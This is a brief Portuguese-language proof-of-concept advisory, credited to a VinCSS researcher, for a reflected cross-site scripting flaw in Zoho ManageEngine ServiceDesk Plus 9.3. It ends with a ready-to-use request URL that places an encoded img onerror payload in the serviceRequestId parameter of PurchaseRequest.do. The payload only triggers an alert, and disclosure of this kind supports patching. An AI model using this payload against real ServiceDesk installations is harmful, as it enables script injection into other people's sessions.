
Prova de conceito de exploit XSS para Zoho ManageEngine ServiceDesk Plus 9.3 através do parâmetro serviceRequestId do PurchaseRequest.do, demonstrando vulnerabilidade de cross-site scripting refletida.
Informação Descrição: Foi descoberto um problema no Zoho ManageEngine ServiceDesk Plus 9.3. Existe XSS através do parâmetro serviceRequestId no PurchaseRequest.do.
Autor: Concobe da Tarantula Team - VinCSS (um membro da Vingroup)
domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=1%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E1